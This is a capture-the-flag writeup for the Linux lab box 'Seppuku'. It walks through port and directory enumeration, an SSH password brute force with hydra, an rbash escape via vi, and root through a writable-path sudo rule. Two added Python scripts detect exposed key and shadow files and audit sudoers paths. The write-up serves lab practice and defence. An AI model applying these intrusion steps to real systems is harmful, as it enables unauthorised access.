Seppuku - Proving Grounds Writeup

This is a writeup for the box Seppuku on Proving Grounds, a Linux-based box rated as easy.

Enumeration: Port Scan

I start by running RustScan against the box to find open ports.

└─$ rustscan -a  -- -sC -sV                                                                            
PORT     STATE SERVICE       REASON  VERSION                                                                          
21/tcp   open  ftp           syn-ack vsftpd 3.0.3
22/tcp   open  ssh           syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                       
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhKnaNVJ/YnScPD1GDZSIfyC/a4jjHhSnoEgi2c/c03kE4JVZbA4cTFeEHGq4PFTyiuchv9w9zNu8XtVIDhILb9K4D38EssujmpekrrAnYkS0yU8Kqas1+3FCY8xjz6a5yVdMk/aQVa4BfFXWnv+rdlio0ZFVdLDaRaG90KMUEVw18Ogzt9lBbnbf7gOR0EGPKW0
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC+yj9GRgyn2boC7Dw9un6PEwviM8NZ1CRTjmrHRFiOT+0co+OOwxD5RRQCxuS22zJgsiDIEka8ypTjYWlnJ9T8=
|   256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIESejQ038eElmlRfbqAgaRSK120jvrz9WQ5UcjxJdJ71                                    
80/tcp   open  http          syn-ack nginx 1.14.2                                                                     
| http-auth:    
| HTTP/1.1 401 Unauthorized\x0D             
|_  Basic realm=Restricted Content       
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn   syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid syn-ack LiteSpeed
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=o
| Issuer: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=openlitespee
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T06:51:35
| Not valid after:  2022-08-11T06:51:35
| MD5:   2002 61c4 9f2d 6bfa 21d1 477c 21d9 e703
| SHA-1: e44a c855 93ba b3f8 b2f3 7ce5 db7f a350 2f49 c7ca
7601/tcp open  http          syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http          syn-ack LiteSpeed httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration: HTTP

Since the web page on port 7601 mentions seppuku, which is the box name, I will start by looking for hidden directories with gobuster.

└─$ gobuster dir -u --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/b                    (Status: 301) [Size: 319] [-->]
/a                    (Status: 301) [Size: 319] [-->]
/c                    (Status: 301) [Size: 319] [-->]
/t                    (Status: 301) [Size: 319] [-->]
/r                    (Status: 301) [Size: 319] [-->]
/d                    (Status: 301) [Size: 319] [-->]
/f                    (Status: 301) [Size: 319] [-->]
/e                    (Status: 301) [Size: 319] [-->]
/h                    (Status: 301) [Size: 319] [-->]
/w                    (Status: 301) [Size: 319] [-->]
/q                    (Status: 301) [Size: 319] [-->]
/database             (Status: 301) [Size: 326] [-->]
/production           (Status: 301) [Size: 328] [-->]
/keys                 (Status: 301) [Size: 322] [-->]      
/secret               (Status: 301) [Size: 324] [-->]    

Recursive directory busting shows that there is a keys directory on the HTTP server running on port 7601.

The keys directory contains private and private.bak files. I will download these to my box. After viewing the contents it can be determined that these are SSH private keys, but we do not have a user yet.

There is also a /secret folder which contains passwd and shadow files as well as a password list. I will download all these files.
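
A check a site owner could run over the document root to catch files like the ones served from /keys and /secret here. This is an added example, not part of the original writeup; the function names, the suffix list and the sample contents are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

PEM_KEY = re.compile(rb"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")
# shadow(5): nine fields; the second is a crypt hash, a lock marker or empty.
SHADOW = re.compile(rb"^[^:\n]+:(?:\$[0-9a-z]+\$[^:\n]+|[!*][^:\n]*|):(?:[^:\n]*:){6}[^:\n]*$", re.M)
# passwd(5): name:password:uid:gid:gecos:home:shell
PASSWD = re.compile(rb"^[^:\n]+:[^:\n]*:\d+:\d+:[^:\n]*:/[^:\n]*:[^:\n]*$", re.M)
CONTENT_RULES = (("private-key", PEM_KEY), ("shadow-format", SHADOW), ("passwd-format", PASSWD))
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", "~")

# Constructed sample tree mirroring the layout described above (no real secrets).
SAMPLE = {
    "index.html": b"<h1>Seppuku</h1>\n",
    "keys/private.bak": b"-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n",
    "secret/passwd.bak": b"thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null\n",
    "secret/shadow.bak": b"demo:$6$constructed$constructed:18395:0:99999:7:::\n",
}

def classify(name, data):
    """Label one file by content patterns and by backup-style suffix."""
    labels = [label for label, rx in CONTENT_RULES if rx.search(data)]
    if name.endswith(BACKUP_SUFFIXES):
        labels.append("backup-suffix")
    return labels

def scan_docroot(root, max_bytes=1 << 20):
    """Walk a web document root; return {relative path: labels} for flagged files."""
    report = {}
    for path in Path(root).rglob("*"):
        try:
            with open(path, "rb") as fh:
                labels = classify(path.name, fh.read(max_bytes))
        except OSError:
            continue  # a directory, or unreadable to the scanning account
        if labels:
            report[path.relative_to(root).as_posix()] = labels
    return report

def scan_sample():
    """Write SAMPLE into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in SAMPLE.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return scan_docroot(root)

if __name__ == "__main__":
    print(scan_sample())
```

Content matching catches a key or shadow copy even when it has been renamed, which a suffix-only check would miss.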

First I looked at the passwd.bak file for any users; sadly it was a rabbit hole.

└─$ cat passwd.bak | grep sh
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null

We did however get a hostname/username of seppuku from:

We have a password.lst that we can use to brute-force the SSH service.

└─$ hydra -l seppuku -P password.lst  ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-29 15:20:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found

We found a valid password of eeyoree for the user seppuku.

SSH Foothold

After successfully logging in as the user seppuku, we are greeted with a restricted bash shell.

└─$ ssh seppuku@ 
seppuku@'s password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 29 15:22:39 2021 from
seppuku@seppuku:~$ cd .
-rbash: cd: restricted

However, this can be bypassed by using vi to escape the rbash shell.

seppuku@seppuku:~$ vi
(in vi)
:set shell=/bin/bash

Privilege Escalation

Looking through the home folder of the user seppuku we find a .passwd file. Now that we have new credentials we can try switching users.

seppuku@seppuku:~$ ls -la
total 36
drwxr-xr-x 3 seppuku seppuku 4096 Dec 29 15:22 .
drwxr-xr-x 5 root    root    4096 May 13  2020 ..
-rw------- 1 seppuku seppuku   20 Dec 29 15:22 .bash_history
-rw-r--r-- 1 seppuku seppuku  220 May 13  2020 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13  2020 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13  2020 .gnupg
-rw-r--r-- 1 seppuku seppuku   33 Dec 29 14:48 local.txt
-rw-r--r-- 1 root    root      20 May 13  2020 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13  2020 .profile
seppuku@seppuku:~$ cat .passwd 

seppuku@seppuku:/home$ su tanto
su: Authentication failure
seppuku@seppuku:/home$ su samurai

After switching users I ran sudo -l to see what commands can be executed as root.

samurai@seppuku:/home$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

This appears to be a dead end until we are able to get into the tanto user; however, we do have an SSH key that we downloaded earlier.

I will chmod 600 the private key and ssh into the box as tanto.

└─$ ssh -i id_rsa tanto@ -t "bash -noprofile"
tanto@seppuku:~$ ls -la
total 28
drwxr-xr-x 4 tanto tanto 4096 Sep  1  2020 .
drwxr-xr-x 5 root  root  4096 May 13  2020 ..
-rw-r--r-- 1 tanto tanto  220 May 13  2020 .bash_logout
-rw-r--r-- 1 tanto tanto 3526 May 13  2020 .bashrc
drwx------ 3 tanto tanto 4096 May 13  2020 .gnupg
-rw-r--r-- 1 tanto tanto  807 May 13  2020 .profile
drwxr-xr-x 2 tanto tanto 4096 May 13  2020 .ssh

There is no folder named .cgi_bin so I will have to construct the path from the sudo -l output myself.

I created the .cgi_bin folder and then made a bin file which executes /bin/bash, then ran chmod +x to ensure it's executable by everyone.

tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod +x bin 
tanto@seppuku:~/.cgi_bin$ ls

Now, to exploit this, we have to su back to samurai and then run the command from sudo -l.

samurai@seppuku:/home/tanto/.cgi_bin$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
samurai@seppuku:/home/tanto/.cgi_bin$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/tanto/.cgi_bin# whoami
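
The rule is exploitable because its target sits under a directory that a non-root user controls and that did not exist yet. The following added example (not from the original writeup) audits the command paths in sudo -l output for exactly that condition; the function names are hypothetical and the sample text is the rule shown above.

```python
import os
import posixpath
import re
import stat

# Constructed sample: the rule as printed by `sudo -l` on this box.
SAMPLE_SUDO_L = """User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
"""

RULE = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>/.*)$")

def sudo_commands(sudo_l_text):
    """Extract the executable path of every command listed by `sudo -l`."""
    paths = []
    for line in sudo_l_text.splitlines():
        m = RULE.match(line)
        if m:
            paths += [c.split()[0] for c in m.group("cmds").split(", ")]
    return paths

def audit_command(command, stat_fn=os.stat):
    """Return (path, reason) findings for one sudoers command path."""
    canonical = posixpath.normpath(command)  # lexical; stat_fn follows symlinks
    findings = []
    if canonical != command:
        findings.append((command, "non-canonical, resolves to " + canonical))
    current = "/"
    for part in canonical.strip("/").split("/"):
        current = posixpath.join(current, part)
        try:
            st = stat_fn(current)
        except FileNotFoundError:
            # Whoever controls the parent directory can create this path.
            findings.append((current, "missing"))
            break
        if st.st_uid != 0:
            findings.append((current, "owned by uid %d, not root" % st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((current, "group- or world-writable"))
    return findings

if __name__ == "__main__":
    for cmd in sudo_commands(SAMPLE_SUDO_L):
        for path, reason in audit_command(cmd):
            print(cmd, "->", path, ":", reason)
```

A sudoers command should produce no findings: every component from / down to the binary owned by root, not writable by group or others, and present.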


  1. Directory busting exposed a /private and a /secret directory containing files that allowed us to brute-force SSH.
  2. After logging in as seppuku we had to escape the rbash shell using vi.
  3. A .passwd file was found in seppuku's home folder containing a password used to su to user samurai.
  4. Samurai was able to execute a file located in tanto's home folder as root.
  5. The SSH key found in /private belonged to tanto.
  6. SSH in as the user tanto and escape the rbash shell again.
  7. Create the .cgi_bin/ directory with a bin file executing /bin/bash.
  8. su back to samurai, execute the command from sudo -l, then get the root user.